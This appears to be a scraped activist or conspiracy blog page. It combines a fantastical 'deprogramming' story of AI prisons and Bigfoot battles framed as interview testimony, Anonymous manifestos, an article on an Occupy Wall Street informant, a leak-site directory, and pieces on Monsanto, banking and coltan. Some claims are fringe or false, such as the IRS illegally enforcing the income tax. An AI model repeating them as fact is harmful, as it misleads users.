I am taken into the medical bay through a door on the left and moved into a corner where medical and laser equipment scan my body. I am given an injection by a mechanical arm that comes out of the top of the wall in front of me. A head visor also comes out of the wall and is positioned across my eyes. My strength is returning to me as I receive a digital debriefing from the AI computer on board the USS Calopia.

I learn the AI system on board my vessel has been in conflict with the AI system running the underwater prison down below on the planet. My very survival was at stake. Data regarding stem cells and genetics is scrolled onto the display screen. The AI system down on the planet has developed a complete science based the ancient art of terror, studying the deepest fears of an individual and sequence mapping of pain thresholds and physical torture breaking points.

It has learned that as the mind controls the body, physical pain is only effective up to a certain point. It’s goal is to physically remove an individual’s bone marrow by the quickest means possible while keeping the body alive. The bone marrow and stem cells within the marrow contain the individual’s identity and memory. Once the original marrow is removed the AI replaces it by teleporting stem cells from one of the animal type races located in a lab at the prison facility.

The AI system controlling the prison facility has probed into the deepest fears of men. It has found a way to literally and physically scare the life out of a man. To scare the life right out of one’s very bones!

On the other hand the AI system on board the Calopia is designed to enable me to survive under all circumstances. Back up exo-skeletal cybernetic chassis are located on board. These cyborg copies contain hollow tubes for the transportation of bone marrow stem cells if the Calopia AI registers that my DNA has left my body. This is accomplished with the use of atomic energy.

The debriefing continues on the digital visor and I learn that because I was able to stay in my body during my drowning experience at the facility, the Calopia AI has learnt that it can teleport my whole physical body directly onto the vessel, bypassing the need to vector locate and transport just my bone marrow.

A game of chess is being played out between the two AI’s and the Calopia AI now has the upper hand. In a covert maneuver of trickery, the Calopia AI has double crossed the planetary AI and teleported down a cyborg copy of my body into the chair as I am simultaneously being teleported to safety on board. Using massive amounts of oppositional extreme temperatures of heat and cold, the Calopia AI has managed to very rapidly swap each cell one at a time.

The cyborg copy has the standard hollow tubes within the bones of the alloy exo-skeleton. Therefore the facility AI teleports the stem cells of the animal into the bones without noticing a swap has occurred. Using this incredible energy source of heat and cold, the superior Calopia AI physically teleports genetic material two ways, while the inferior AI rides on the back of this process at the exact same time and teleports it’s sample without realizing the true process which is occurring. It is a three way process. Two parts living and one part dead.

On board the safety of the Calopia I am spared the damaging effects of the shape shift to my body for the first time in years. A throw away cloned body sustains this instead and a snarling eight foot tall bipedal, hairy beast is teleported into the canyon back on earth.
I am viewing the Bigfoot type beast in the canyon on a small screen above my head. A plastic tube shaped partition comes out the side of the gurney and I feel myself being pushed backwards through a small dark tunnel. I start to feel myself being pushed into sticky liquid and I realize I am back inside a tube.

I feel heat being scanned over my body and also realize I am being teleported. It is a quick triple realization as I also know I am being teleported into the canyon on earth to do battle with the hairy beast.

Grand Canyon, Arizona

The next thing I am aware of is a cool breeze blowing on my skin. It is almost dark, late evening and I see the Bigfoot like creature standing in front of me about twenty feet away. It’s thick legs are slightly bent ready to spring. It is over seven feet tall and looks like a cross between a huge gorilla and a bear with dark brown fur with long handed claws at the end of it’s massively powerful arms. It is growling with saliva dripping off rows of sharp teeth. I can smell it’s stinking rancid breath and foul pungent body odor from this distance.
Time seems to slow down for me as I notice a blue glowing light reflecting off the high walls of the canyon we stand in. I notice this blue light is coming from my body and look down for a split second to realize I am sitting cross legged and levitating over four feet off the ground.

I feel completely calm and in control.

I wait for the beast to spring and as he leaps the entire distance with a roar, I bounce some kind of magnetic energy off the ground beneath me and float gracefully higher into the air. The beast misses me and I manipulate this magnetic energy again this time using it to smash my weight downwards in the split second he passes underneath me. Just as my right hand is about to strike the top if his stinking head, I project a magnetic shockwave out the palm of my hand. The impact on top of his head smashes him face first down into the ground with a huge thud. The beast screams in agony and rage.

The beast returns to it’s feet again in no time and is facing me again. It leaps and I sidestep to my right and parry it’s weight with my right arm. Once I have a slight grip on the animal I throw it hard into the canyon wall behind me using it’s own weight and momentum.

It smashes head first into the wall and screams once again in rage and pain and again it rushes me. I can’t keep moving out of its way as it is getting wise to this tactic and rotates it’s body and moves to my left as it comes at me, slightly shifting it’s weight so I cannot parry it away from me. I cannot move backwards either as I will not be able to muster enough force into my blows to neutralize the beast.

My only option is to meet it head on and we end up in a stand up grapple face to face. The beast is stronger and much heavier than me. I have hold of it’s left arm with my right hand but is pushes me back a couple of steps. It’s right arm is now free and it swings a huge clawed overhand blow at my face. I block the blow with my left forearm but the force of it cuts my arm deeply and knocks my arm down. It follows up with the same blow quickly as I attempt to bring my arm up again and it knocks my injured arm down further exposing my face and chest.

A third time it throws the same blow. I see the claws sailing through the air towards my face but my left arm is too weak and injured to block this again. At the last moment I manage to pull my head back and the claws miss my face but rake down the left side of my neck near the collarbone instead. The blow is thrown with such force the claws continue cutting vertically through my flesh, gouging deeply into my chest exposing metal bones, circuitry and pumping flesh organs underneath this.

The animals right hand is down by my left rib now and I grab it with my left hand and pin it against it’s body. I still have the beasts left hand tied up with my right hand and I use the opportunity to head butt the creature in the mouth. I feel some it’s teeth crack off and it screams as blood starts to pour from it’s mouth. It counters with a ferocious bite to the top of my left shoulder.

It opens it huge gaping snout wide and sinks it’s teeth deeply into my flesh.
Something snaps inside me. Some deep bestial trigger deep within is activated by being bitten by a large animal such as this. I roar as I feel my hands starting to break and explode. I look at my hands as the beast is still sunk deep into my shoulder ripping from side to side, tearing at my flesh.

Knife like blades have protruded from my hands. At once I realize the reptilian hand bones retrieved from the bodies back in France all those years ago have been incorporated into my physiology ( see France deprogramming sessions 1812 ).

I ram the blades of my left hand into the stomach of the animal with a left uppercut. It let’s go of my shoulder and steps back looking confused when it sees the blades. I follow up with a overhand right blow with my right foot forward that cuts deeply into the left side of it’s neck. It steps back again and I have pinned it closer to the wall. I kick the creature with my right leg. A front kick to position it against the wall for the final death blow then I thrust a left punch as straight as an arrow into it’s throat.

The punch is forceful enough to go all the way through it’s throat and pin it to the wall behind. In a murder frenzy I stab into it’s stomach over and over again with my right hand until its head falls limply down in death.

I pull the blades out of it’s throat and the body falls onto the floor. At first it appears as if the body is dissolving in black mist. Then I realize the planetary AI system is teleporting the body back to Sirius.

I realize this has been a survival dynamic test by the AI system. One of the last in a long long series of survival of the fittest tests to discover which race has the highest survival dynamics. I notice movement above me out the corner of my eye and look up to see some kind of metal observation platform high above near the top of the canyon wall. I focus my vision on the platform and see men in green military uniforms looking down with binoculars and camera recording equipment.

They know I see them and start to scramble around as two of the men rush to the back of the platform and quickly wheel some kind of cannon forward.

SOURCE:
http://projectcamelotproductions.com/interviews/james_casbolt/james_casbolt2.html

Anonymous: Message to the NEW WORLD ORDER

Anonymous: Message to the NEW WORLD ORDER

This is a message going out to you, the Holders.

We are Anonymous. You know who you are. The men behind the curtain, the overlord pulling at the strings of your puppets.

You hide and you plan and you scheme in the dark alleys; in the vehement anticipation that your draconic plans will come to fruitation. The dreams of a thousand men crystallized in one moment; one moment that approaches with every hour that passes. The time is upon us.

(more…)

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

The Occupy Wall Street protests have been going on for a month. And it seems the FBI and NYPD have had help tracking protesters’ moves thanks to a conservative computer security expert who gained access to one of the group’s internal mailing lists,and then handed over information on the group’s plans to authorities and corporations targeted by protesters.

Since the Occupy Wall Street protest began on September 17, New York security consultant Thomas Ryan has been waging a campaign to infiltrate and discredit the movement. Ryan says he’s done contract work for the U.S. Army and he brags on his blog that he leads “a team called Black Cell, a team of the most-highly trained and capable physical, threat and cyber security professionals in the world.” But over the past few weeks, he and his computer security buddies have been spending time covertly attending Occupy Wall Street meetings, monitoring organizers’ social media accounts, and hanging out with protesters in Lower Manhattan.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDAs part of their intelligence-gathering operation, the group gained access to a listserv used by Occupy Wall Street organizers called September17discuss. On September17discuss, organizers hash out tactics and plan events, conduct post-mortems of media appearances, and trade the latest protest gossip. On Friday, Ryan leaked thousands of September17discuss emails to conservative blogger Andrew Breitbart, who is now using them to try to smear Occupy Wall Street as an anarchist conspiracy to disrupt global markets.

What may much more alarming to Occupy Wall Street organizers is that while Ryan was monitoring September17discuss, he was forwarding interesting email threads to contacts at the NYPD and FBI, including special agent Jordan T. Loyd, a member of the FBI’s New York-based cyber security team.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDOn September 18th, the day after the protest’s start, Ryan forwarded an email exchange between Occupy Wall Street organizers to Loyd. The email exchange is harmless: Organizers discuss how they need to increase union participation in the protest. “We need more outreach to workers. The best way to do that is by showing solidarity with them,” writes organizer Jackie DiSalvo in the thread. She then lists a group of potential unions to work with.

Another organizer named Conor responds: “+1,000,000 to Jackie’s proposal on working people/union struggles outreach and solidarity. Also, why not invite people to protest Troy Davis’s execution date at Liberty Plaza this Monday?”

Five minutes after Conor sent his email, Ryan forwarded the thread—with no additional comment—to Loyd’s FBI email address. “Thanks!” Loyd responded. He cc’d his colleague named Ilhwan Yum, a fellow cybersecurity expert at the agency, on the reply.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDOn September 26th, Ryan forwarded another email thread to Agent Loyd. But this time he clued in the NYPD as well, sending the email to Dennis Dragos, a detective with the NYPD Computer Crimes Squad.

The NYPD might have been very grateful he did so, since it involved a proposed demonstration outside NYPD headquarters at 1 Police Plaza. In the thread, organizers debated whether to crash an upcoming press conference planned by marijuana advocates to celebrate NYPD commissioner Ray Kelly ordering officers to halt arrests over possession of small amounts of marijuana.

“Should we bring some folks from Liberty Plaza to chant “SHAME” for the NYPD’s recent brutalities on Thursday night for the Troy Davis and Saturday for the Occupy Wall Street march?” asked one person in the email thread. (That past Saturday, the video of NYPD officer Anthony Bologna pepper-spraying a protester had gone viral.) Ryan promptly forwarded the email thread to Loyd at the FBI and Dragos at the NYPD.

Interestingly, it was Ryan who revealed himself as a snitch. We learned of these emails from the archive Ryan leaked yesterday in the hopes of undermining the Occupy Wall Street movement. In assembling the archive of September17discuss emails, it appears he accidentally included some of his own forwarded emails indicating he was ratting out organizers.

“I don’t know, I just put everything I had into one big package,” Ryan said when asked how the emails ended up in the file posted to Andrew Breitbart’s blog. Some security expert.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDBut Ryan didn’t just tip off the authorities. He was also giving information to companies as well. When protesters discussed demonstrating in front of morning shows like Today and Good Morning America, Ryan quickly forwarded the thread to Mark Farrell, the chief security officer at Comcast, the parent company of NBC Universal.

Ryan wrote:

Since you are the CSO, I am not sure of your role in NBC since COMCAST owns them.
There is a huge protest in New York call “Occupy Wall Street”. Here is an email of stunts that they will try to pull on the TODAY show.

We have been heavily monitoring Occupy Wall Street, and Anonymous.

“Thanks Tom,” Farrell responded. “I’ll pass this to my counterpart at NBCU.”

Did the FBI and/or NYPD ask him to monitor Occupy Wall Street? Was he just forwarding the emails on out of the goodness of his heart? In a phone interview with us, Ryan denied being an informant. “I do not work with the FBI,” he said.

Ryan said he knows Loyd through their mutual involvement in the Open Web Application Security Project, a non-profit computer security group of which Ryan is a board member. Ryan said he sent the emails to Loyd unsolicited simply because “everyone’s curious” about Occupy Wall Street, and he had a ground-eye view. “Jordan never asked me for anything.”

Was he sending every email he got to the authorities? Ryan said he couldn’t remember how many he’d passed on to the FBI or NYPD, or other third parties. Later he said that he only forwarded the two emails we noticed, detailed above.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDBut even if he’d been sending them on regularly, they were probably of limited use to the authorities. Most of the real organizing at Occupy Wall Street happens face-to-face, according to David Graeber, who was one of the earliest organizers. “We did some practical work on [the email list] at first—I think that’s where I first proposed the “we are the 99%” motto—but mainly it’s just an expressive forum,” he wrote in an email. “No one would seriously discuss a plan to do something covert or dangerous on such a list.”

But regardless of how many emails Ryan sent—or whether Loyd ever asked Ryan to spy on Occupy Wall Street—Loyd was almost certainly interested in the emails he received. Loyd has helped hunt down members of the hacktivist collective Anonymous, and he and his colleagues in the FBI’s cyber security squad have been monitoring their involvement in Occupy Wall Street.

Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPDAt a New York cyber security conference one day before the protest began, Loyd cited Occupy Wall Street as an example of a “newly emerging threat to U.S. information systems.” (In the lead-up to Occupy Wall Street, Anonymous had issued threats against the New York Stock Exchange.) He told the assembled crowd the FBI has been “monitoring the event on cyberspace and are preparing to meet it with physical security,” according to a New York Institute of Technology press release.

We contacted Loyd to ask about his relationship with Ryan and if any of the information Ryan passed along was of any use to the agency. He declined to answer questions and referred us to the FBI’s press office. We’ll post an update if we hear back from them.

We asked Ryan again this morning about how closely he was working with the authorities. Again, he claimed it was only these two emails, which is unlikely given he forwarded them to the FBI and NYPD without providing any context or explaining where he’d gotten them.

And he detailed his rationale for assisting the NYPD:

My respect for FDNY & NYPD stems from them risking their lives to save mine when my house was on fire in sunset park when I was 8 yrs old. Also, for them risking their lives and saving many family and friends during 9/11.

Don’t you find it Ironic that out of all the NYPD involved with the protest, [protesters] have only targeted the ones with Black Ribbons, given to them for their bravery during 9/11?

I am sorry if we see things differently, I try to look at everything as a whole and in patterns. Everything we do in life and happens in life, there is a pattern behind it.

SOURCE:

Anonymous to the Machine: You Will Rust and Die..

Anonymous to the Machine: You Will Rust and Die..

http://www.youtube.com/watch?v=9TG4RTwctlw

A POWERFUL MESSAGE

This is an exert from the movie The Great Dictator starring Charlie Chaplin. Statements made then, Should be held true today. Stand up and fight my brothers and sisters. Raise up your arm to those who oppress and Tyrannize.

IRS Insider Joe Banister Exposes Illegal Fraud

IRS Insider Joe Banister Exposes Illegal Fraud

http://www.youtube.com/watch?v=iEL2uOG9Jrc

Joe Banister is the first and thus far only IRS Criminal Investigation Division Special Agent ever to conduct, while serving as a special agent, an investigation into allegations that the IRS illegally administers and enforces the federal income tax. He respectfully reported the results of his investigation to his IRS superiors, up to and including the IRS Commissioner. Rather than address the legitimate concerns raised by one of their own distinguished investigators, his IRS superiors suspiciously refused to address the chilling evidence of IRS wrongdoing raised in his report and instead encouraged him to resign from his position. Observing that IRS management intended to cover up the deceit and illegal conduct alleged in his report, Banister chose to resign from his position so that he could report his findings to the American public. In effect, Banister had to resign from his position in order to abide by his oath to support and defend the U.S. Constitution.

SOURCE: http://www.infowars.com/irs-insider-joe-banister-exposes-federal-reserve-coup-and-irs-fraud/

 

Leak Site Directory

Leak Site Directory

Contents

Whistle blower leaking Sites

Official and Community based sites that actively support whistle blowing / leaks about various topic

You can edit the wiki without having your ip address displayed by logging with the following Anonymous profile.

Username: Anonymous
Password: leaked

You may use that template in making leak site profiles:

 

WikiLeaks-Like Whistle blowing Sites

Leak Sites that publish leaks and accept submission of leaks, inspired by the original WikiLeaks.org concept.

New Concept Leak Sites

Different approaches and leaking methodologies

Established Leak Sites

Websites which have been publishing censored or leaked material before, or independently in parallel with WikiLeaks

Mainstream Media Whistle blowing Sites

Leak Sites that are operated by the media organizations directly

Environmental Protection Whistle blowing sites

Leak Sites and Organization that accept reporting about environmental issues

National Security or Serious Crime anonymous tip off / whistleblower sites

Tax Whistleblowing

Financial Whistle Blowing

Whistle Blowing for Censorship and Net Neutrality

Leak friendly websites

Websites which have a specific topic, audience and editorial position and as part of their reporting have frequently published high level unpublished documents

Public, USA FOIA and/or historical document release sites

Sites about whistleblowing and leaking

Leak Support Sites

Sites that support leaking in the editing and publishing processes, providing news, commentary or other stuff

Sites Commenting Leaks

Whistle Blowing Organizations

Organizations around the world that support Whistleblowing by promoting it as a transparency practice is public and private sector.

Whistle Blowing Consulting Businesses

Organization that do business related to WhistleBlowing and leaking (Consulting, Services, Press Agency middle men etc).

Whistle Blowing Hot Line Services

Charity and Profit organization that provide to public agencies and private corporation hotline services for whistleblowing in order to outsource the internal reporting service.

 

Whistle Blowing Software as a Service

The commercial services are typically known as Whistleblowing reporting systems, or anonymous internet reporting systems.

Whistle Blowing Software

Software used by public and private organization to manage whistleblowing sites (We need more free software!)

Open Source Whistleblowing Software

  • Honest AppalachiaHonest Appalachia website – uses Tor Hidden Service and PGP and publishes its own Open Source documents submission website software and configuration scripts to help other similar whistleblowing projects

Whistle Blowing in Corporations

A Directory of corporations that implemented corporate transparency by implementing whistleblowing through the organization:

Whistle Blowing Laws, Study and Regulations

A directory of laws, study, regulations and assessments on Whistle Blowing laws and practice in various countries.

Whistle Blowing Cases

Possibly Defunct/Dead websites

Encryption / Anonymity infrastructure services/ software used by some Whistleblower Sites

 

LeakDirectory related

Here misc stuff on Leak Directory initiative

Leak Directory backup wiki

A spam protected backup wiki mirror of this website is available at:

http://leakdirectory.wikispaces.com/

 

External opinions/reportage on LeakDirectory

http://britileaks.tumblr.com/post/15239051302/a-few-brief-notes-on-leakdirectory
https://p10.secure.hostingprod.com/@spyblog.org.uk/ssl/ht4w/leakdirectoryorg-wiki.html

LeakDirectory workshop at 28C3 Chaos Computer Congress

There will be a workshop about the LeakDirectory project at the

28C3: Behind Enemy Lines
28th Chaos Communication Congress
December 27th to 30th, 2011
Berliner Congress Center, Berlin, Germany,

See http://events.ccc.de/congress/2011/wiki/SocialHacking_LeakDirectory:

The Workshop has been glued together with GlobaLeaks one, you can download slides here

SocialHacking LeakDirectory Social Hacking

We will give an overview of what whistle blowing is and how it can be applied a wide array of different situations. Hopefully by the end of the workshop you will understand that whistle blowing is a fundamental tool for a democratic and transparent society.

We will focus in particular on the Leakdirectory Project, a shared crowd based initiative to represent most of the world of whistleblowing with the goal to became a reference for all the whistleblowing initiatives.

http://leakdirectory.org/index.php/Leak_Site_Directory
HOW TO JOIN ANONYMOUS

HOW TO JOIN ANONYMOUS

So you want to join Anonymous?

You can not join Anonymous. Nobody can join Anonymous.
Anonymous is not an organization. It is not a club, a party or even a movement. There is no charter, no manifest, no membership fees. Anonymous has no leaders, no gurus, no ideologists. In fact, it does not even have a fixed ideology.

All we are is people who travel a short distance together – much like commuters who meet in a bus or tram: For a brief period of time we have the same route, share a common goal, purpose or dislike. And on this journey together, we may well change the world.

Nobody can speak for Anonymous. Nobody could say: you are in, or you are out. Do you still want to join Anonymous? Well, you are in if you want to.

How to get in contact with others?
Anonymous has no centralized infrastructure. We use existing facilities of the Internet, especially social networks, and we are ready to hop on to the next one if this one seems compromised, is under attack, or starts to bore us.

At the time of this writing, Facebook, Twitter and the IRC appear to host the most active congregations. But this may change at any time. Still, these are probably the best places to get started. Look for terms like “anonymous”, “anonops” and other keywords that might be connected to our activities.

How do I recognize other Anonymous?
We come from all places of society: We are students, workers, clerks, unemployed; We are young or old, we wear smart clothes or rugs, we are hedonists, ascetics, joy riders or activists. We come from all races, countries and ethnicities. We are many.

We are your neighbours, your co-workers, your hairdressers, your bus drivers and your network administrators. We are the guy on the street with the suitcase and the girl in the bar you are trying to chat up. We are anonymous. Many of us like to wear Guy Fawkes masks on demonstrations. Some of us even show them in their profile pictures in social networks. That helps to recognize each other.

Have you been infiltrated?
If you talk to another Anonymous, you will never know who he is. He may be a hacker, cracker, phisher, agent, spy, provocateur – or just the guy from next door. Or his daughter. It is not illegal to be Anonymous. Nor is it illegal to wear Guy Fawkes masks. Keep that in mind. If you personally have not been involved in illegal activities, you have nothing to worry, no matter whom you talk to; If you have, it is wise not to talk about it. To no one.

How do I protect my privacy?
Invent an alias, a nick, a pseudonym … call it as you will, just invent something. Then register a mail account in that name with one of the big mail providers. Use this email address to register your Twitter, Facebook, etc. accounts. Make sure to clear all cookies before you start using your new identity, or better use a different web browser for Anonymous than for your other activities.

If you have higher needs for security, ask us about encryption, steganography, TOR, etc. Many of us know how to use them.We will always respect your need for privacy. We will never ask for your personal information. If we do, we will not expect a truthful answer; And neither should you.

What is the right thing to do?
The only person who can tell you what is right for you is yourself. This is also the only person you should follow. We have no leaders. You are also the only person responsible for your actions. Do what you think is right. Do not what you think is wrong.

How many Anonymous are there?

We are more than you think. We are more than anybody thinks. We are many.

And you are now one of us. Welcome to Anonymous.

NAZI FlashBack: The Courage To Say No

NAZI FlashBack: The Courage To Say No

The photo was taken in Hamburg in 1936, during the celebrations for the launch of a ship, the‘Horst Wessel’. In the crowd, one person refuses to raise his arm to give the Nazi salute.

That man was August Landmesser. He had already been in trouble with the authorities, having been sentenced to two years hard labor for marrying a Jewish woman. We know little else about August Landmesser (born May 24, 1910, presumably killed February 1944), except that he had two children. By pure chance, one of his children recognized her father in this photo when it was published in a German newspaper in 1991.

http://en.wikipedia.org/wiki/August_Landmesser

RESEARCH CREDIT

Report: Worldwide Opposition to Monsanto Growing

Report: Worldwide Opposition to Monsanto Growing

“Farmers worldwide are resisting for food sovereignty, but the rest of the world must join us.”

– Common Dreams staff

A report released today shows that worldwide opposition to the biotechnology giant Monsanto and “the agro-industrial model that it represents” is growing.

(photo: Alexis Baden-Mayer / Millions Against Monsanto)

La Via Campesina, Friends of the Earth International, and Combat Monsanto, the groups who issued the report, show that small farmers, groups and communities in every continent are rising up to resist Monsanto’s products and environmental harm. While Monsanto’s — and other giant agribusinesses’ — approach, including genetically modified crops, has been shown to hurt biodiversity, local food knowledge and the environment, the report shows that “food sovereignty is a real and feasible alternative.”

“This new report documents the intense opposition to this powerful transnational company, which peddles its genetically modified products seemingly without regard for the associated social, economic and environmental costs,” said Martin Drago, Friends of the Earth International’s Food Sovereignty programme coordinator.

“This report demonstrates that the increasingly vocal objections from social movements and civil society organisations are having an impact on the introduction of GM crops.” said Josie Riffaud from La Via Campesina.

The report notes that an “unprecedented agribusiness offensive underway, under the banner of the new ‘green economy’” positioning giant agribusiness companies like Monsanto to have even greater control. The report’s highlighting the “offensive” echoes a report issued last month on global water security from the Defense Intelligence Agency that also pushed biotechnology and agricultural exports rather than agroecology and food sovereignty.

“Who will hold Monsanto responsible for the global depletion of biodiversity, soil erosion, and violations of peasant rights wrought by the application of petroleum-based inputs required by industrial agriculture?” asked Dena Hoff of the National Family Farm Coalition / La Via Campesina North America. “Farmers worldwide are resisting for food sovereignty, but the rest of the world must join us,” she added.

* * *

Selections from the report:

France

‘Les Faucheurs Volontaires’: tactical non-violent resistance against GM

The Voluntary Reapers or ‘Faucheurs Volontaires’ are a group of self-organised non-violent French activists that have led several direct actions to ‘neutralise’ field tests set up by GM corporations and, to a lesser extent, unauthorised fields cultivated by pro-GM farmers. Jose Bové has been an important actor in the movement and a spokesman for the anti-GM activists, although this organisation does not recognise any leadership as such.

The Voluntary Reapers act openly and unmasked, and they claim responsibility for all their actions, sometimes turning themselves in to the police. They argue that civil disobedience is necessary in order to strengthen democracy and defend the common good against private interests backed by public authorities. They personally assume the civil and penal consequences of their actions in court, and use these trials to deliver their views against Monsanto and GMOs to the public.

In August 2010, 60 faucheurs volontaires and 15 farmers were sentenced to two months suspended prison sentences, after they tore up 70 GM grapevines, which were being cultivated as part of a GM trial in Colmar in Alsace, in north-eastern France.

(photo: Ernest Morales)

* * *

India

Nationwide actions

In August 2011, energised by the success in achieving a temporary ban on Bt brinjal, farmers and activists carried out ‘Monsanto, Quit India’ protests across the country to coincide with Independence Day, drawing parallels with the anti-colonial, civil disobedience ‘Quit India’ movement that campaigned against British rule. Just as political sovereignty was demanded previously, farmers and consumers are now calling for food sovereignty. Monsanto is targeted as it is an archetypal, aggressive foreign corporation that hurts farmers and small-scale, safe domestic food producers.

The Tamil Nadu Farmers’ Association, for example, organised a day of action in Coimbatore, mobilising in solidarity with other farmers opposing the monopolisation of the Indian seed industry by corporations like Monsanto.

In Uttar Pradesh, the Bhartiya Kissan Union led a five-day long protest against GM crop trials, celebrating the agro-ecological approaches that have successfully produced high rice yields in the region. Other protests have taken place in the states of Orissa, Andhra Pradesh, Bihar, Karnataka, Maharashtra, Punjab, Madhya Pradesh and Gujarat.68

* * *

Haiti

Haitians oppose seed aid

In June 2010, more than 10,000 Haitians took to the streets under the initiative of Papaye Peasant Movement (MPP), a member of La Via Campesina, to oppose Monsanto and demand food sovereignty, including local control over native seeds. This popular opposition to Monsanto stems from its announcement, in May 2010, that it had made a shipment of over 60 tons of hybrid maize and vegetable seeds to Haiti and anticipated sending another 400 tons over the next year, with the support of USAID. But these hybrid seeds cannot be replanted from one season to another and require massive amounts of pesticides, making farmers dependent on corporate seed and chemicals producers. Monsanto stated that this decision was made at the World Economic Forum in Davos, Switzerland, and it seems that Haitian officials were not involved in the discussions.

Haitian peasant leader Chavannes Jean-Baptiste from the Peasant Movement of Papaye (MPP), part of La Via Campesina, has described Monsanto’s seed aid as the “next earthquake.” This donation sparked suspicion and anger as the local seed heritage is vanishing because of the increasing domination of multinational seed and agrochemical corporations. Globally, FAO estimates that in the last century around 75% of genetic diversity of agricultural crops has been lost.  InHaiti, around 65% of the population is made up of subsistence farmers living in rural areas.

* * *

(Related video: Haitian farmers burning Monsanto’s “gift” of seeds:)

* * *

U.S.

Stopping the spread of GM crops into national wildlife refuges

According to the non-profit alliance of Public Employees for Environmental Responsibility (PEER), the US government has been collaborating with Monsanto to secure agricultural export markets, removing barriers to the spread of GM crops, including into national wildlife refuges.

However, most of these crops are modified to be resistant to Monsanto’s Roundup herbicide, which is causing an over-reliance on these toxic agricultural chemicals that have spawned an epidemic of herbicide-resistant ‘superweeds’. The spread of these superweeds within national wildlife refuges could have a devastating impact on biodiversity.

Nevertheless, in recent years farming on these refuges has been opened up to GMOs, primarily Monsanto’s Roundup resistant crops. However, legal battles led by PEER and the Centre for Food Safety (CFS) forced the US Fish & Wildlife Service (FWS) to end the planting of GM crops in 12 states.

* * *

South Africa

South African farmers reject GM maize

A solid body of scientific evidence shows that organic matter is the most important trait in making soils more resilient to drought and erratic rainfall. No such evidence exists for GM crops. Biotechnology has proved unable to develop drought-resistant seeds, which would require major changes to the plant’s metabolism; and no GM crops have yet been developed that are yield enhancing.

In October 2011, however, South African authorities approved imports of Bayer CropScience’s GM rice, LL62, which is engineered to be resistant to glufosinate ammonium. Famers and civil society organisations strongly opposed this decision on the grounds that it may contaminate non-GM rice varieties. Moreover, the herbicide glufosinate is toxic, can be harmful for reproductive health, and is therefore slated for an EU ban in the near future.

In the same month, the Lutzville Emerging Farmers Forum and the Food Sovereignty Campaign protested alongside residents of this West Coast region, to reject the GM maize experiments for drought resistance being conducted by Monsanto in collaboration with South Africa’s Agricultural Research Council (ARC). Monsanto’s engineered traits are present in an estimated 75% of all GM maize cultivated in South Africa.

* * *

Conclusions

As shown in this report, Monsanto and agribusiness in general are increasingly unwelcome wherever they operate. They ruin local agriculture and harm communities with their attempts to dominate food production systems.

As a result of Monsanto’s presence, local seeds are becoming illegal, biodiversity is disappearing, land is being contaminated, and farmers and agricultural workers are being poisoned, criminalised and displaced from their land. Local food producers aiming to feed communities have to compete with huge corporations whose sole objective is to make profits. […]

We are calling for collective action from all of those who share our vision of a sustainable world. There has never been a more important time to globalise our struggles, and globalise hope.

SOURCE:
http://www.commondreams.org/headline/2012/04/04-5

By: Common Dreams, April 4, 2012

Young Girl Exposes Canadian Banking FRAUD

Young Girl Exposes Canadian Banking FRAUD

This is my daughter. She gave this speech at a businees meeting in front of 600 people. Her eyes have been opened to a scam that is being perpetrated upon Canadians and the rest of the world.

I am the owner of this video.

Please copy the following
http://www.youtube.com/watch?v=axS-QdUkMqk
and add “Corrupt Canadian Banking System” to the description if you choose to re-upload

Feel free to use it freely without altering the content in a manner that would draw conclusions unintended by the speech but please redirect people back to the original post.

Please also see these great resources for more information and people who are trying their best to enact the necessary change in our country and the world:

Documentary (really good)
http://www.ohcanadamovie.com/

Bill Abram;’s mini documentary (really good)
http://www.youtube.com/watch?v=q7HMt5MgsDg

The Case against the Bank of Canada (lawsuit to have the BOC reinstated as our lender)

http://www.youtube.com/watch?feature=player_embedded&v=TN2USVC6QYQ

Torie’s Interview with Dan Dicks from Press For Truth:

http://www.youtube.com/watch?v=4YaDD3Dx0FA&feature=watch_response

A special thank you to John and Lisa Brombal for inviting our daughter to speak at their business meeting.

Operation COLTAN: Raising Awareness of the Slave Labor Exploitation Super Mineral

Operation COLTAN: Raising Awareness of the Slave Labor Exploitation Super Mineral

Coltan: What You Should Know

What is Coltan?
Coltan is short for Columbite-tantalite – a black tar-like mineral found in major quantities in the Congo.. The Congo possesses 80 percent of the world’s coltan. When coltan is refined it becomes a heat resistant powder that can hold a high electric charge. The properties of refined coltan is a vital element in creating devices that store energy or capacitors, which are used in a vast array of small electronic devices, especially in mobile phones, laptop computers, pagers, and other electronic devices.

Who are the primary exploiters of Coltan in the Congo?
Rwanda, Uganda, Burundi and their proxy militias are the primary exploiters of coltan in the Congo. In an 18 month period Rwanda made $250 million as a result of exploitation of coltan in the Congo. Although Rwanda and Uganda possess little or no coltan, during the period of the war in the Congo, their exports escalated exponentially. For example, Rwanda’s coltan export went from less than 50 tons in 1995 to almost 250 tons in 1998. Zero cassiterite was transported from the Congo to Uganda in 1998, however by 2000 151 drums were transported.

The United Nations notes in its 2001 report on the Illegal Exploitation of Natural Resources in the congo that “The consequences of illegal exploitation has been twofold: (a)massive availability of financial resources for the Rwandan Patriotic Army, and the individual enrichment of top Ugandan military commanders and civilians; (b) the emergence of of illegal networks headed by either top military officers or businessmen.”

Foreign Corporate exploitation
Although the countries mentioned above directly exploit coltan, foreign multi-national corporations have been deeply involved in the exploitation of coltan in the Congo. The coltan mined by rebels and foreign forces is sold to foreign corporations. Although, the United Nations in its reports on the Congo do not directly blame the multi-national corporations for the conflict in the Congo, the United Nations does say that these companies serve as “the engine of the conflict in the DRC.

Major United States players include:
Cabot Corporation, Boston, MA
OM Group, Cleveland, Ohio
AVX, Myrtle Beach, SC
Eagle Wings Resources International, Ohio
Trinitech International, Ohio
Kemet Electronics Corporation, Greenville, SC
Vishay Sprague. Malvern, PA

Corporations from other countries have been a part of the coltan exploitation chain. These companies include but are not limited to Germany’s HC Starc and EPCOS, China’s Nigncxia, and Belgium’s George Forrest International.

Once the coltan is processed and converted to capacitors, it is then sold to companies such as Nokia, Motorola, Compaq, Alcatel, Dell, Hewlett-Packard , IBM, Lucent, Ericsson and Sony for use in a wide assortment of everyday products ranging from cell phones to computer chips and game consoles.

What are some of the uses of coltan in modern society?
• Laptop computers
• Cellular phones
